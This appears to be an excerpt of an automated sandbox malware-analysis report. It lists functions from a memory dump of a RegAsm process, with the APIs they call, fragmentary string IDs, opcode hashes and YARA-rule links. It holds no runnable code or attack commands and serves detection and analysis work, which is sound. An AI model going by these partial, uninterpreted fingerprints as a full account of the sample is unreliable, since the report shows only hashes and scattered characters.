                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: AllocString
                            • String ID: !$($)$+$+$-$.$/$0$9$@$A$B$D$E$F$I$K$O$P$P$S$U$W$\$^$^$_$_$d$m$s$v$w$y$}$}
                            • API String ID: 2525500382-976402049
                            • Opcode ID: 46cd7ee09498a8a8491a55f179fa5e984a101541a1555a629cdac049a0cf5210
                            • Instruction ID: 576aadb19522540648950b7bf6b0d2c0c498edb4cf283208b3fb563146e4fcf6
                            • Opcode Fuzzy Hash: 46cd7ee09498a8a8491a55f179fa5e984a101541a1555a629cdac049a0cf5210
                            • Instruction Fuzzy Hash: 13A18F7010CBC1CAD332CA2898487DFBFE16BA2324F484A9DD1ED4A2E2D77A4505C767
                            Function 00429987 Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 87COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Variant$ClearInit
                            • String ID: D$H$I$O$T$W$i$j$q$t$v$w$|$}
                            • API String ID: 2610073882-22406253
                            • Opcode ID: c8c5fa1d16e475f0572ba7125c23dc9ef044702073f1ec141579e52f857b2519
                            • Instruction ID: 336da4d6fed128c72ad7679c9a0f8008dc77258edc9aef18df431c255b68b1d1
                            • Opcode Fuzzy Hash: c8c5fa1d16e475f0572ba7125c23dc9ef044702073f1ec141579e52f857b2519
                            • Instruction Fuzzy Hash: BE41E53010C7C1CAD362DB38948875FBFE06B92228F480A9DF5E94B2D2C3768545CB63
                            Function 00429803 Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 80COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Variant$ClearInit
                            • String ID: D$H$I$O$T$W$i$j$q$t$v$w$|$}
                            • API String ID: 2610073882-22406253
                            • Opcode ID: 74ca4637a1e4e94c80ce5bfd5fb7e9d410792d774c5e5ad2d41a33fc1e3db5d6
                            • Instruction ID: 90d1c1b1053df66a56c70cfc540901d9bb98b71b5530b44ab8206a7a50a71cb5
                            • Opcode Fuzzy Hash: 74ca4637a1e4e94c80ce5bfd5fb7e9d410792d774c5e5ad2d41a33fc1e3db5d6
                            • Instruction Fuzzy Hash: F141D36050C7C19AD361DB38948874EBEE06B93228F485A9DF5E94A3D2D3768449CB63
                            Function 00428A02 Relevance: 26.3, APIs: 2, Strings: 13, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Variant$ClearInit
                            • String ID: E$G$H$I$O$P$R$_$_$k$n$u$v
                            • API String ID: 2610073882-2010711895
                            • Opcode ID: 8b1fbfb38f269da7f6f13a7b9a4b3bd798ea5cdd330c8687a9583e44ceead904
                            • Instruction ID: 83f6437a5590d5b321407a8994d041d5f7abad960d4222dcdb67f0203ac81d5f
                            • Opcode Fuzzy Hash: 8b1fbfb38f269da7f6f13a7b9a4b3bd798ea5cdd330c8687a9583e44ceead904
                            • Instruction Fuzzy Hash: C551D46010C7C28ED332DB28C448B9FBFE0ABA6214F048EADE0ED87292D7754545DB53
                            Function 0042BB41 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 82COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: InitVariant
                            • String ID: L$M$O$Q$S$U$W$Y$[$]$_$a$c$g
                            • API String ID: 1927566239-4170794764
                            • Opcode ID: 02b4a10cd23c046851b8c57ce2b801c7fc0f98f43e4149047d01fc6e806d5dae
                            • Instruction ID: 6f14f368d2229a16a5203173952421c306e64fe05f10d5b5169ee32fb79ed347
                            • Opcode Fuzzy Hash: 02b4a10cd23c046851b8c57ce2b801c7fc0f98f43e4149047d01fc6e806d5dae
                            • Instruction Fuzzy Hash: F241B36010D7C1CAE331CB28C858B9FBFD1ABA2314F188A5DD4E94B392C7765545CB67
                            Function 0042B0E7 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 76COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: InitVariant
                            • String ID: L$M$O$Q$S$U$W$Y$[$]$_$a$c$g
                            • API String ID: 1927566239-4170794764
                            • Opcode ID: 8a9565558f47ef9723cbd1744227e53cdbd4404125a975d96b7d65afe333c541
                            • Instruction ID: 361c94b86e934ad4f53b28de643c7f57f516ed9ad8f2e4a4b2553fee85b8e1af
                            • Opcode Fuzzy Hash: 8a9565558f47ef9723cbd1744227e53cdbd4404125a975d96b7d65afe333c541
                            • Instruction Fuzzy Hash: 4441956010D7C2CEE332CB288858B9BBFE16BA2314F184A9DD4E84B2D2D7755505CB67
                            Function 0042A824 Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 81COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Variant$ClearInit
                            • String ID: C$G$I$I$L$R$]$k$w$x$|
                            • API String ID: 2610073882-2069860185
                            • Opcode ID: 3875fb74a75f011a79d4f8b94a8cf36ff0948e5b9f7646498d43783635673602
                            • Instruction ID: bd23ceb0028a003d45712e038235c1c6edc676f7454d0cd008355763c95bb3e5
                            • Opcode Fuzzy Hash: 3875fb74a75f011a79d4f8b94a8cf36ff0948e5b9f7646498d43783635673602
                            • Instruction Fuzzy Hash: F441E27000C7C2CED335DB2884897DBBBE0ABAA314F044AADD5E887392D7744155CBAB
                            Function 004295CE Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 80COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Variant$ClearInit
                            • String ID: Q$^$a$j$v$x$y$y$z${$|
                            • API String ID: 2610073882-3303697254
                            • Opcode ID: 4a019a17c0b716da5629be7ed75860f443c36d2579950be30cfeda2dc0277204
                            • Instruction ID: 22e82d42aec6f2d1fe79aa57a841fff8dca8871b36f25ac4e6bc0a8ef34b1a5b
                            • Opcode Fuzzy Hash: 4a019a17c0b716da5629be7ed75860f443c36d2579950be30cfeda2dc0277204
                            • Instruction Fuzzy Hash: 7141817050D3C0CEE3319B68D458B9ABFE0ABA6308F04499ED4CD5B282D7BA5548CB67
                            Function 0042FE83 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 302memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32 ref: 0042FE83
                            • SysAllocString.OLEAUT32(?), ref: 0042FF3B
                            • VariantInit.OLEAUT32(05A907D9), ref: 0042FFA5
                            • SysStringLen.OLEAUT32(?), ref: 00430082
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: String$Alloc$InitVariant
                            • String ID: rCpC$/-$31$?=
                            • API String ID: 3520221836-2124718727
                            • Opcode ID: ffd23f049046782e58e914d1a8fd0f1d957486c910eb2e50db6c485e67fdf023
                            • Instruction ID: fc33126482ec92d8e0425faf00e7c47dae9b616fb936e0071dd592b093b4e344
                            • Opcode Fuzzy Hash: ffd23f049046782e58e914d1a8fd0f1d957486c910eb2e50db6c485e67fdf023
                            • Instruction Fuzzy Hash: 46C15774600B00CFD728CF25D891A26BBF1FF4A314B548A6DD5968BBA2C735E846CF94
                            Function 0040D5B0 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 315COMMON
                            Download Yara Rule
                            APIs
                            • GetSystemDirectoryW.KERNEL32(832D8143,00000104), ref: 0040DA2A
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: DirectorySystem
                            • String ID: *!"#$*X]Z$*\]*$Q"%Z$dc$if*r$if*r$AC
                            • API String ID: 2188284642-2539161172
                            • Opcode ID: 55d2a0bc6faaf9e72acb28dd66414ffbc59c7b7a53b75618fc63f8f386beb6c9
                            • Instruction ID: 6b77db8ee1d565c3337d26d23d912c133c88f28fa078c09a246bbd0f4f21d070
                            • Opcode Fuzzy Hash: 55d2a0bc6faaf9e72acb28dd66414ffbc59c7b7a53b75618fc63f8f386beb6c9
                            • Instruction Fuzzy Hash: C4C166B050E3808BE3318F19D884B9BBBE1FFC6704F144A6DD4C86B295C73999498B97
                            Function 00429CA7 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 197COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: String
                            • String ID: P$Q$Z$_$l$m$}
                            • API String ID: 2568140703-3714998129
                            • Opcode ID: 40747ddecaa16cf9ba5ef4fb7b61d6e7e1e9896f568cf99f9441a4cf06dd590b
                            • Instruction ID: 6a57daea5cd07b3d9315bfe21e4b192fb8c79d475a5c60089d683926de57ad70
                            • Opcode Fuzzy Hash: 40747ddecaa16cf9ba5ef4fb7b61d6e7e1e9896f568cf99f9441a4cf06dd590b
                            • Instruction Fuzzy Hash: DE91087160C3818FD378CB28D4507AEBBE2AFD9314F198A2DE4D987391DB749841CB46
                            Function 00428CFE Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: InitVariant
                            • String ID: 1$3$5$7$9$=$>
                            • API String ID: 1927566239-1319780741
                            • Opcode ID: f22a92daa03b08f872ad9bf831d3ae42a697af0f45a7ff36846638d00a3a2ec9
                            • Instruction ID: daa1fccb42aa98624ddc0a13fd2ffb96488bbc070f56c31fda81dbfdd53f97bb
                            • Opcode Fuzzy Hash: f22a92daa03b08f872ad9bf831d3ae42a697af0f45a7ff36846638d00a3a2ec9
                            • Instruction Fuzzy Hash: BA41157010C3C08EC376DB2894447DEBBE0ABA6314F448E5EE4E887382CB74424ACB97
                            Function 0042FBA9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 165comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.OLE32(0043AA50,00000000,00000001,0043AA40,?,?,0000000D,559257A3,00000008,?), ref: 0042FCDA
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CreateInstance
                            • String ID: Wcba
                            • API String ID: 542301482-1349633429
                            • Opcode ID: f776d32055d0ee90eb4815d02ac6c4b9eaf2365654d0af6beee30833f16b5a48
                            • Instruction ID: 9a5016b978177a139ad1bdf6e7233de9d1b6c54d04e93206ed70933c9ac2bebc
                            • Opcode Fuzzy Hash: f776d32055d0ee90eb4815d02ac6c4b9eaf2365654d0af6beee30833f16b5a48
                            • Instruction Fuzzy Hash: 815116B4600B009FD320CF29DA45B16BBF0FB0A704F548A5DE59A8BB91C376E856CF95